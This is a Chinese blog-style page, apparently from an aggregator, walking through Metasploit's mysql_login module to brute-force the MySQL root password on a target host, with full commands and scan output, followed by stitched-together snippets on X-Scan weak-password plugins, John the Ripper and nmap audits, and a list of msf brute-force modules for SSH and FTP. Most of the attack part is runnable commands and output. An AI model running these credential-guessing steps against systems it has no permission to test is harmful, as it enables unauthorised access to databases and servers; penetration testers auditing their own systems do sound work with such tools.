Metasploit扫描Mysql弱口令

msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml  msf连接数据库

[*] Rebuilding the module cache in the background...

msf > db_status   查看数据库连接状态

[*] postgresql connected to msf3

msf > use auxiliary/scanner/mysql/mysql_login   加载扫描模块

msf auxiliary(mysql_login) > set RHOSTS 1.5.5.3   目标IP地址

RHOSTS => 1.5.5.3

msf auxiliary(mysql_login) > set USERNAME root    目标用户名 一般为root

USERNAME => root

msf auxiliary(mysql_login) > set

PASS_FILE  /pen/msf3/data/wordlists/postgres_default_pass.txt   密码字典路劲,路劲随意填写

PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt

msf auxiliary(mysql_login) > exploit      开始扫描

[*] 1.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16

[*] 1.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”

[*] 1.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”

[*] 1.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’

[*] 1.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’

[*] 1.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’

[*] 1.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’

[*] 1.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’

能否扫描出来主要看密码字典

时间: 2024-08-24 03:08:09

Metasploit扫描Mysql弱口令的相关文章

X-SCAN扫描器插件(MYSQL弱口令以及Mongodb未授权)

因为在很多时候的内网扫描里面没有授权的WIN的好用的,稍微小点的弱口令扫描器(生成报告,多种服务),编译成了插件,再自己弄了个MONGODB的扫描插件用着. X-SCAN加载以后: MONGODB.plug: MYSQL.plug: 扫描: X-SCAN Scan Plugs1.MYSQL弱口令扫描2.MONGODB未授权扫描 X-SCAN下载:http://www.xfocus.net/tools/200507/1057.html SDK:http://www.xfocus.net/proje

Linux以及弱口令,大佬勿喷

1.什么是linux? Linux是一套免费使用和自由传播的类Unix操作系统,是一个基于POSIX和UNIX的多用户.多任务.支持多线程和多CPU的操作系统.它能运行主要的UNIX工具软件.应用程序和网络协议.它支持32位和64位硬件.Linux继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统.『个人比较喜欢linux』 2.怎么安装linux? 一.下载Ubutu的linux系统,这里就不给网址了,大家自己搜索吧. 二.注意自己的操作系统是32位还是64位,需要下载相

linux安全---系统更新+弱口令检测工具+nmap扫描工具

1.添加yum及更新系统 a.更新设置: echo  "0 3 * * 6 yum -y  update" >>/var/spool/cron/root b.添加repo源也叫yum源 添加国内mirrors,提速: cd  /etc/yum.repos.d/ mv  ./*  /root/ wget http://mirrors.aliyun.com/repo/Centos-6.repo   ##下载阿里云yum源 yum  makecache  ##生成缓存 yum  

弱口令检测、端口扫描

前言:在inter环境中,过于简单的口令是服务器面临的最大风险.对于任何一个承担这安全责任的管理员,及时找出这些弱口令是非常必要的,这样便于采取进一步的安全措施, 使用John the Ripper 检测Linux.Unix系统用户的密码强度,使用NMAP扫描端口,可以找出网络中不可控的应用服务,及时关闭不安全的服务,减小安全风险. 1.弱口令探测(john  the ripper) 1)下载并安装:官方网站是http://openwall.com/john/,在该网站可以获取最新的稳定版源码包

linux系统安全-弱口令检测和端口扫描

一.linux系统安全概要二.详细说明1)用户方面清除一些不必要的系统用户,可以减少黑客攻击我们linux的入口:锁定账号适用于员工在一段时间不适用账号的场景(usermod -L):而锁定/etc下的passwd和shadow文件可以避免非法用户建立用户(chattr +i)2)密码方面,设置密码有效期可以做到提醒用户定期更改密码,避免长期使用同一密码导致密码被破解的情况(vim /etc/login.defs和chage -M):设置员工首次登陆更改密码其实是为了员工在登陆账号后更改属于自己

弱口令检测和端口扫描

一.实验环境 在Linux 6.0 以上版本上操作,并且用远程连接虚拟机rhk-2 二.操作脚本 1.光盘挂载 > mount /dev/cdrom /mnt 2.创建用户和设置用户密码 > useradd lisi > passwd lisi 3.建立yum仓库 > cd /etc/yum.repos.d/ > vim aaa.repo > ---[aaa] > ---name=test > ---baseurl=file:///mnt > ---e

Linux服务器的弱口令检测及端口扫描

一.弱口令检测--John the Ripper John the Ripper工具可以帮助我们扫描出系统中密码安全性较低的用户,并将扫描后的结果显示出来. 1.安装John the Ripper:John the Ripper的源码包提取地址:https://pan.baidu.com/s/117J0GZ9moOHfUr-JAuOmug 提取码:n76p 也可从官网直接下载:https://www.openwall.com/john/ [[email protected] media]# ta

CentOS 7系统安全之终端安全控制、系统弱口令检测与端口扫描

一.终端登录安全控制 1.限制root在安全终端登录安全终端配置:/etc/securetty如图我们执行"vim /etc/securetty"命令进入配置文件,只需从该文件中删除或者注释掉对应的行即可禁止 root 用户从指定的终端登录.2.禁止普通用户登录当服务器正在进行备份或调试等维护工作时,可能不希望再有新的用户登录系统.这时候,只需要简单地建立/etc/nologin 文件即可.如图执行"touch /etc/nologin"命令即可禁止普通用户登录.执

msf各种弱口令爆破

Msf: 写的很乱 记录下msf各个爆破弱口令的模块 run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 检测在线主机 metasploit 增加路由 route add 10.10.1.3 255.255.255.0 1 使用扫描模块 use scanner/portscan/tcp 爆破ssh Msf>use auxiliary/scanner/ssh/ssh_login 爆破ftp Msf>us